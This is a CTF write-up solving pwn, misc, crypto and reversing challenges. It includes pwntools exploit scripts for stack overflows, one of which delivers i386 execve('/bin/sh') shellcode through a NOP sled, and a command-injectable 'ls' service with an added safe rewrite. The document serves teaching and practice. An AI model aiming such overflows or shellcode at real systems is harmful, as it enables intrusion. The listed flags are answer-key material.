write up by M4ndU (Team WH0a, high school)
Pwn
Pwn1
355
nc pwn.tamuctf.com 4321
Difficulty: easy
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [sp+1h] [bp-3Bh]@1
  int v5; // [sp+2Ch] [bp-10h]@1
  int v6; // [sp+30h] [bp-Ch]@1
  int *v7; // [sp+38h] [bp-4h]@1

  v7 = &argc;
  setvbuf(stdout, (char *)2, 0, 0);
  v6 = 2;
  v5 = 0;
  puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.");
  puts("What... is your name?");
  fgets(&s, 43, stdin);
  if ( strcmp(&s, "Sir Lancelot of Camelot\n") )
  {
    puts("I don't know that! Auuuuuuuugh!");
    exit(0);
  }
  puts("What... is your quest?");
  fgets(&s, 43, stdin);
  if ( strcmp(&s, "To seek the Holy Grail.\n") )
  {
    puts("I don't know that! Auuuuuuuugh!");
    exit(0);
  }
  puts("What... is my secret?");
  gets(&s);
  if ( v5 == 0xDEA110C8 )
    print_flag();
  else
    puts("I don't know that! Auuuuuuuugh!");
  return 0;
}
```
```python
from pwn import *

p = remote("pwn.tamuctf.com", 4321)

# s sits at [bp-0x3B] and v5 at [bp-0x10]: 0x3B - 0x10 = 43 bytes of padding,
# then the 4 bytes that gets() writes over v5.
v5 = 0xDEA110C8
payload = b"A" * 43
payload += p32(v5)

p.recvline()  # "Stop! Who would cross the Bridge of Death ..."
p.recvline()  # "What... is your name?"
p.sendline(b"Sir Lancelot of Camelot")
p.recvline()  # "What... is your quest?"
p.sendline(b"To seek the Holy Grail.")
p.recvline()  # "What... is my secret?"
p.sendline(payload)
p.interactive()
```
Pwn3
454
Difficulty: easy
```
[*] '/home/mandu/pwn3'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
```
```c
char *echo()
{
  char s; // [sp+Eh] [bp-12Ah]@1

  printf("Take this, you might need it on your journey %p!\n", &s);
  return gets(&s);
}
```
```python
from pwn import *

p = remote("pwn.tamuctf.com", 4323)

# i386 execve("/bin/sh") shellcode, as used in the original solve
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

p.recvuntil(b"ney ")
buffer = int(p.recvuntil(b"!")[:-1], 16)  # leak: address of s printed by echo()

payload = b"A" * (0x12a + 4)         # dummy: fill s and the saved ebp
payload += p32(buffer + 0x12a + 20)  # ret: lands inside the NOP sled below
payload += b"\x90" * 40              # NOP sled
payload += shellcode
p.sendline(payload)
p.interactive()
```
Pwn4
356
nc pwn.tamuctf.com 4324
Difficulty: medium
```c
int laas()
{
  int result; // eax@2
  char s; // [sp+7h] [bp-21h]@1

  puts("ls as a service (laas)(Copyright pending)");
  puts("Enter the arguments you would like to pass to ls:");
  gets(&s);
  if ( strchr(&s, '/') )
    result = puts("No slashes allowed");
  else
    result = run_cmd((int)&s);
  return result;
}
```
```c
int __cdecl run_cmd(int a1)
{
  char s; // [sp+2h] [bp-26h]@1

  snprintf(&s, 0x1Bu, "ls %s", a1);
  printf("Result of %s:\n", &s);
  return system(&s);
}
```
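The writeup shows the decompiled code only, so here is the defensive reading of it as an added example (not the challenge's or the author's code): `laas` reads with `gets` and `run_cmd` hands the string to `system()` after rejecting only `/`, so the real fix is to stop invoking a shell at all and to allowlist the arguments. The function names, the allowlist and the length limit derived from the 0x1B-byte buffer are assumptions of this example.

```python
import re
import subprocess

# Allowlist for ls arguments: flags, names, spaces, dots and dashes only.
# The original "no slashes" rule is preserved; everything else is rejected
# too, and since no shell is ever started nothing here is parsed by /bin/sh.
ARG_RE = re.compile(r"^[A-Za-z0-9 ._-]*$")

# The original snprintf'd into a 0x1B-byte buffer: "ls " + args + NUL,
# so at most 23 characters of arguments could ever have fit.
MAX_ARGS = 0x1B - len("ls ") - 1


def ls_args_ok(args: str) -> bool:
    """True only if args fits the original buffer and matches the allowlist."""
    return len(args) <= MAX_ARGS and ARG_RE.fullmatch(args) is not None


def build_ls_argv(args: str) -> list:
    """Build the argv list for ls; raises ValueError for rejected input."""
    if not ls_args_ok(args):
        raise ValueError("argument rejected")
    return ["ls"] + args.split()


def run_ls(args: str) -> str:
    """Run ls with an argv list (no shell), returning its stdout."""
    proc = subprocess.run(build_ls_argv(args), capture_output=True,
                          text=True, check=False)
    return proc.stdout


if __name__ == "__main__":
    print(run_ls("-la"))
```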
MISC
Howdy!
mic check
flag : gigem{H0wdy!}
Who am I?
100
What is the A record for tamuctf.com? (Not in standard gigem{flag} format)
Difficulty: easy
I used the 'ping' command to find out the A record for tamuctf.com
[MS cmd]
>ping tamuctf.com
Ping tamuctf.com [52.33.57.247] 32바이트 데이터 사용:
flag : 52.33.57.247
Who do I trust?
100
Who issued the certificate to tamuctf.com? (Not in standard gigem{flag} format)
Difficulty: easy
SSL checker: https://www.sslshopper.com/ssl-checker.html#hostname=tamuctf.com
I could get the SSL issuer from it.
flag : Let's Encrypt Authority X3
Where am I?
100
What is the name of the city where the server for tamuctf.com is located?
(Not in standard gigem{flag} format)
Difficulty: easy
52.33.57.247
I heard you like files.
428
Bender B. Rodriguez was caught with a flash drive with only a single file on it. We think it may contain valuable information. His area of research is PDF files, so it's strange that this file is a PNG.
Difficulty: easy-medium
The PNG end signature (IEND) is at 0x340232; after it come a base64-encoded string and a PDF file.
I tried decoding the base64 string:
Nice try, but there is no flag here.
You should check this music video out though, it's pretty cool.
https://www.youtube.com/watch?v=TuJqUvBj4rE
but it was not a flag.
Then I extracted the PDF part of the data and opened it.
ok... rename .pdf to .zip.
I found another PNG file.
Open it with a hex viewer: a PDF file again.
Found a base64 string.
flag : flag{P0lYt@r_D0_y0u_G3t_It_N0w?}
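An added example (not part of the writeup) that automates the first step of the polyglot unpacking above: walk the PNG chunk list to find where the IEND chunk ends, then report any base64 run and any embedded file signature in the trailing bytes. It runs on a constructed sample, not the challenge file; the function names and the signature list are this example's own choices.

```python
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Signatures that hint at a second file appended after the PNG.
KNOWN = [(b"%PDF-", "pdf"), (b"PK\x03\x04", "zip"), (PNG_SIG, "png")]


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past the IEND chunk's CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # length/type header + payload + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("IEND chunk not found")


def carve_trailing(data: bytes) -> dict:
    """Describe what follows the PNG: end offset, decoded base64 run, embedded signatures."""
    end = png_end_offset(data)
    tail = data[end:]
    found = {"png_end": end, "base64": None, "embedded": []}
    m = re.search(rb"[A-Za-z0-9+/]{16,}={0,2}", tail)
    if m:
        try:
            found["base64"] = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            pass  # looked like base64 but did not decode cleanly
    for sig, kind in KNOWN:
        i = tail.find(sig)
        if i != -1:
            found["embedded"].append((kind, end + i))
    return found


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk with a correct CRC (used only for the sample)."""
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))


# Constructed sample: minimal PNG, then a base64 note, then a fake PDF header.
SAMPLE = (PNG_SIG + _chunk(b"IHDR", b"\x00" * 13) + _chunk(b"IEND", b"")
          + base64.b64encode(b"Nice try, no flag here") + b"\n%PDF-1.4\n%constructed\n")
```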
MicroServices
0_intrusion
100
Welcome to MicroServices inc, where we do all things micro and service oriented!
Recently we got an alert saying there was suspicious traffic on one of our web servers. Can you help us out?
- What is the IP Address of the attacker?
Open it with Wireshark.
Sorting the packets by length shows that 10.91.9.93 sent many TCP packets to the server,
so the attacker's IP is 10.91.9.93.
flag : 10.91.9.93
Crypto
-.-
244
To 1337-H4X0R:
Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?
Difficulty: easy
dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah 
di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit 
dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah 
dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit
Since each group is made up of 4 or 5 elements, they must be Morse code. The title of this task is also -.-
Replace:
dah ------> _
di, dit ---> .
- ------> (nothing)
and decode it!
0X57702A6C58744751386538716E6D4D59552A737646486B6A49742A5251264A705A766A6D2125254B446B6670235E4E39666B346455346C423372546F5430505A516D4351454B5942345A4D762A21466B386C25626A716C504D6649476D612525467A4720676967656D7B433169634B5F636C31434B2D7930755F683476335F6D3449317D20757634767A4B5A7434796F6D694453684C6D385145466E5574774A404E754F59665826387540476E213125547176305663527A56216A217675757038426A644E49714535772324255634555A4F595A327A37543235743726784C40574F373431305149
Oh, it's a hex value.
Hex to string: https://codebeautify.org/hex-string-converter
Wp*lXtGQ8e8qnmMYU*svFHkjIt*RQ&JpZvjm!%%KDkfp#^N9fk4dU4lB3rToT0PZQmCQEKYB4ZMv*!Fk8l%bjqlPMfIGma%%FzG gigem{C1icK_cl1CK-y0u_h4v3_m4I1} uv4vzKZt4yomiDShLm8QEFnUtwJ@NuOYfX&8u@Gn!1%Tqv0VcRzV!j!vuup8BjdNIqE5w#$%V4UZOYZ2z7T25t7&xL@WO7410QI
flag : gigem{C1icK_cl1CK-y0u_h4v3_m4I1}
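The decode procedure above as an added example (not the author's code): the spelled-out dah/di/dit words are turned into Morse, then into text, and the resulting 0X... hex is converted to ASCII and searched for a gigem{...} flag. The sample is the first four groups of the challenge text; the function names are this example's own.

```python
import re

# International Morse table for the symbols the message uses (letters and digits).
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}


def dahdit_to_morse(word: str) -> str:
    """'dah-di-dit' -> '-..': dah is a dash, di and dit are dots."""
    out = []
    for part in word.lower().split("-"):
        if part == "dah":
            out.append("-")
        elif part in ("di", "dit"):
            out.append(".")
        else:
            raise ValueError(f"unexpected token {part!r} in {word!r}")
    return "".join(out)


def decode_dahdit(text: str) -> str:
    """Decode a whitespace-separated stream of spelled-out Morse words into text."""
    return "".join(MORSE[dahdit_to_morse(w)] for w in text.split())


def hex_to_text(hexstr: str) -> str:
    """Strip an optional 0x/0X prefix and turn the hex digits into ASCII."""
    digits = re.sub(r"^0[xX]", "", hexstr.strip())
    return bytes.fromhex(digits).decode("ascii")


def find_flag(text: str):
    """Return the first gigem{...} token in text, or None."""
    m = re.search(r"gigem\{[^}]*\}", text)
    return m.group(0) if m else None


# Constructed sample: the first four groups of the challenge text, spelling 0X57.
SAMPLE = "dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit"
```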
Reversing
Cheesy
100
Where will you find the flag?
```cpp
 1  int __cdecl main(int argc, const char **argv, const char **envp)
 2  {
 3    __int64 v3; // rdx@1
 4    __int64 v4; // rdx@1
 5    __int64 v5; // rdx@1
 6    __int64 v6; // rdx@1
 7    __int64 v7; // rdx@1
 8    __int64 v8; // rdx@1
 9    int result; // eax@1
10    __int64 v10; // rcx@1
11    char v11; // [sp+Fh] [bp-41h]@1
12    char v12; // [sp+10h] [bp-40h]@1
13    __int64 v13; // [sp+38h] [bp-18h]@1
14
15    v13 = *MK_FP(__FS__, 40LL);
16    std::operator<<<std::char_traits<char>>(&std::cout, "QUFBQUFBQUFBQUFBQUFBQQ==\n", envp);
17    std::operator<<<std::char_traits<char>>(&std::cout, "Hello! I bet you are looking for the flag..\n", v3);
18    std::operator<<<std::char_traits<char>>(
19      &std::cout,
20      "I really like basic encoding.. can you tell what kind I used??\n",
21      v4);
22    std::operator<<<std::char_traits<char>>(&std::cout, "RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v5);
23    std::operator<<<std::char_traits<char>>(&std::cout, "Q2FuIHlvdSByZWNvZ25pemUgYmFzZTY0Pz8=\n", v6);
24    std::operator<<<std::char_traits<char>>(&std::cout, "RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v7);
25    std::allocator<char>::allocator(&v11);
26    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(
27      &v12,
28      "Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==\n",
29      &v11);
30    std::allocator<char>::~allocator(&v11);
31    std::operator<<<std::char_traits<char>>(&std::cout, "WW91IGp1c3QgbWlzc2VkIHRoZSBmbGFn\n", v8);
32    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&v12);
33    result = 0;
34    v10 = *MK_FP(__FS__, 40LL) ^ v13;
35    return result;
36  }
```
Decode the base64 string on line 28 (the one stored in v12 but never printed).
flag : gigem{3a5y_R3v3r51N6!}
Snakes over cheese
191
What kind of file is this?
Decompile the .pyc file with https://python-decompiler.com/
```python
from datetime import datetime
Fqaa = [102, 108, 97, 103, 123, 100, 101, 99, 111, 109, 112, 105, 108, 101, 125]
XidT = [83, 117, 112, 101, 114, 83, 101, 99, 114, 101, 116, 75, 101, 121]

def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)

    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)

        print alYe
    else:
        print datetime.now()


if __name__ == '__main__':
    main()
```
Good
I thought alYe was the flag, because this program prints alYe when the input is equal to kUIl.
Convert Fqaa to ASCII.
flag : flag{decompile}